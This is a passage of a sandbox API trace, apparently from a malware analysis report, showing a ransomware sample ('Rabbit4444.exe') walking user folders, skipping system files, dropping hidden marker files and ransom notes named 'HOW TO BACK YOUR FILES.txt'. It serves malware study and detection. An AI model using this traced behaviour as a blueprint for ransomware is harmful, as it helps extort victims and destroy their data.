ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xe170ad7, ftLastWriteTime.dwHighDateTime=0x1d32715, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TempState", cAlternateFileName="TEMPST~1")) returned 1 [0063.353] lstrcmpiW (lpString1="TempState", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0063.353] lstrcmpiW (lpString1="TempState", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0063.353] lstrcmpiW (lpString1="TempState", lpString2="Rabbit4444.exe") returned 1 [0063.353] lstrcmpiW (lpString1="TempState", lpString2=".") returned 1 [0063.353] lstrcmpiW (lpString1="TempState", lpString2="..") returned 1 [0063.353] lstrcmpiW (lpString1="TempState", lpString2="windows") returned -1 [0063.353] lstrcmpiW (lpString1="TempState", lpString2="bootmgr") returned 1 [0063.353] lstrcmpiW (lpString1="TempState", lpString2="pagefile.sys") returned 1 [0063.353] lstrcmpiW (lpString1="TempState", lpString2="boot") returned 1 [0063.353] lstrcmpiW (lpString1="TempState", lpString2="ids.txt") returned 1 [0063.353] lstrcmpiW (lpString1="TempState", lpString2="NTUSER.DAT") returned 1 [0063.353] lstrcpyW (in: lpString1=0x130ebce, lpString2="TempState" | out: lpString1="TempState") returned="TempState" [0063.353] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122080 [0063.353] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xaa) returned 0x123c90 [0063.353] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122088 | out: ListHead=0xf68b0, ListEntry=0x122088) returned 0x122328 [0063.353] FindNextFileW (in: hFindFile=0x102590, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe170ad7, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd1b326c8, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xe170ad7, ftLastWriteTime.dwHighDateTime=0x1d32715, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TempState", cAlternateFileName="TEMPST~1")) returned 0 [0063.353] FindClose (in: hFindFile=0x102590 | out: hFindFile=0x102590) returned 1 [0063.353] lstrcpyW (in: lpString1=0x130ebce, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0063.353] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsmaps_8wekyb3d8bbwe\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0063.361] CreateFileMappingW (hFile=0x298, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0063.361] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0063.361] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0063.361] CloseHandle (hObject=0x278) returned 1 [0063.362] CloseHandle (hObject=0x298) returned 1 [0063.362] GetCurrentThreadId () returned 0xd98 [0063.362] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122088 [0063.362] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\TempState", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\TempState") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\TempState" [0063.362] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x123c90 | out: hHeap=0xe0000) returned 1 [0063.362] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122080 | out: hHeap=0xe0000) returned 1 [0063.362] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\TempState" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\TempState") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\TempState" [0063.362] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\TempState", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\TempState\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\TempState\\" [0063.362] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\TempState\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\TempState\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\TempState\\.BFC0E91B00AE8A0620D3" [0063.362] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\TempState\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsmaps_8wekyb3d8bbwe\\tempstate\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x298 [0063.364] WriteFile (in: hFile=0x298, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0063.367] FlushFileBuffers (hFile=0x298) returned 1 [0063.368] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\TempState\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0063.368] CloseHandle (hObject=0x298) returned 1 [0063.368] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\TempState") returned 84 [0063.369] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0063.369] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\TempState\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe170ad7, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd1b326c8, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef168b13, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102510 [0063.369] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0063.369] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0063.369] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0063.369] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0063.369] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe170ad7, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd1b326c8, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef168b13, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0063.369] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0063.369] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0063.369] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0063.369] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0063.369] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0063.369] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xef168b13, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xef168b13, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xef18ed11, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0063.369] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0063.369] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0063.369] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xef168b13, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xef168b13, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xef18ed11, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0063.369] FindClose (in: hFindFile=0x102510 | out: hFindFile=0x102510) returned 1 [0063.369] lstrcpyW (in: lpString1=0x130ebe2, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0063.369] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\TempState\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsmaps_8wekyb3d8bbwe\\tempstate\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0063.370] CreateFileMappingW (hFile=0x298, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0063.370] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0063.370] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0063.370] CloseHandle (hObject=0x278) returned 1 [0063.370] CloseHandle (hObject=0x298) returned 1 [0063.370] GetCurrentThreadId () returned 0xd98 [0063.370] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122328 [0063.370] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\SystemAppData", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\SystemAppData") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\SystemAppData" [0063.370] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x123380 | out: hHeap=0xe0000) returned 1 [0063.370] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122320 | out: hHeap=0xe0000) returned 1 [0063.370] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\SystemAppData" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\SystemAppData") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\SystemAppData" [0063.371] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\SystemAppData", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\SystemAppData\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\SystemAppData\\" [0063.371] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\SystemAppData\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\SystemAppData\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\SystemAppData\\.BFC0E91B00AE8A0620D3" [0063.371] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\SystemAppData\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsmaps_8wekyb3d8bbwe\\systemappdata\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x298 [0063.372] WriteFile (in: hFile=0x298, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0063.374] FlushFileBuffers (hFile=0x298) returned 1 [0063.375] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\SystemAppData\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0063.375] CloseHandle (hObject=0x298) returned 1 [0063.376] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\SystemAppData") returned 88 [0063.376] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0063.376] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\SystemAppData\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd2f14b6, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0xbd2f14b6, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xef18ed11, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102a90 [0063.376] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0063.376] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0063.376] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0063.376] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0063.376] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd2f14b6, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0xbd2f14b6, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xef18ed11, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0063.376] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0063.376] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0063.376] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0063.376] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0063.376] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0063.376] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xef18ed11, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xef18ed11, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xef18ed11, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0063.376] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0063.376] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0063.376] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xef18ed11, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xef18ed11, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xef18ed11, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0063.376] FindClose (in: hFindFile=0x102a90 | out: hFindFile=0x102a90) returned 1 [0063.376] lstrcpyW (in: lpString1=0x130ebea, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0063.376] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\SystemAppData\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsmaps_8wekyb3d8bbwe\\systemappdata\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0063.377] CreateFileMappingW (hFile=0x298, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0063.377] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0063.378] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0063.378] CloseHandle (hObject=0x278) returned 1 [0063.378] CloseHandle (hObject=0x298) returned 1 [0063.378] GetCurrentThreadId () returned 0xd98 [0063.378] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122108 [0063.378] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\Settings", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\Settings") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\Settings" [0063.378] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x118398 | out: hHeap=0xe0000) returned 1 [0063.378] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122100 | out: hHeap=0xe0000) returned 1 [0063.378] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\Settings" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\Settings") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\Settings" [0063.378] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\Settings", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\Settings\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\Settings\\" [0063.378] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\Settings\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\Settings\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\Settings\\.BFC0E91B00AE8A0620D3" [0063.378] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\Settings\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsmaps_8wekyb3d8bbwe\\settings\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x298 [0063.381] WriteFile (in: hFile=0x298, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0063.383] FlushFileBuffers (hFile=0x298) returned 1 [0063.384] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\Settings\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0063.384] CloseHandle (hObject=0x298) returned 1 [0063.385] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\Settings") returned 83 [0063.385] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0063.385] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\Settings\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe170ad7, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x7133ee1b, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xef18ed11, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102750 [0063.385] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0063.385] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0063.385] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0063.385] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0063.385] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe170ad7, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x7133ee1b, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xef18ed11, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0063.385] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0063.385] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0063.385] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0063.385] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0063.385] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0063.385] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xef18ed11, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xef18ed11, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xef1b4f55, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0063.385] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0063.385] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0063.385] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe22f6ae, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xe22f6ae, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0xe22f6ae, ftLastWriteTime.dwHighDateTime=0x1d32715, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="roaming.lock", cAlternateFileName="ROAMIN~1.LOC")) returned 1 [0063.385] lstrcmpiW (lpString1="roaming.lock", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0063.385] lstrcmpiW (lpString1="roaming.lock", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0063.385] lstrcmpiW (lpString1="roaming.lock", lpString2="Rabbit4444.exe") returned 1 [0063.386] lstrcmpiW (lpString1="roaming.lock", lpString2=".") returned 1 [0063.386] lstrcmpiW (lpString1="roaming.lock", lpString2="..") returned 1 [0063.386] lstrcmpiW (lpString1="roaming.lock", lpString2="windows") returned -1 [0063.386] lstrcmpiW 